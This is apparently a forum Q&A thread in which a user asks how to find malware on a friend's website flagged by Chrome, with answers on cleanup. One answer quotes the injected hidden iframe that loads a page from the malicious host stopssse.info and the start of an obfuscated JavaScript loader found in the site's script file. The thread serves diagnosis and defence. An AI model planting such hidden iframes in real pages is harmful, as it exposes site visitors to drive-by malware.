How can I test if a website is infected with malware?

Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However this time I, can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.

I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.

I also tested the site with siteadvisor.com it says "We tested this site and didn't find any significant problems".

Can PHP hide a reference to the malware site so I cant find it with a simple search? If so, how can you find it?


Solution 1:

I found this in the generated source

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

It was right below the body tag, it's not in the actual page source, it's being added by obfuscated javascript

edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd looking javascript function. That's the obfuscated javascript function I was telling you about. It starts with

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

Best bet is to find and remove it.

Solution 2:

Your are most probably dealing with XSS attacks.

In that case, two steps :

  • Scan the DB, looking for "scripts" tags, and get rid of them.
  • Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.

Solution 3:

The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.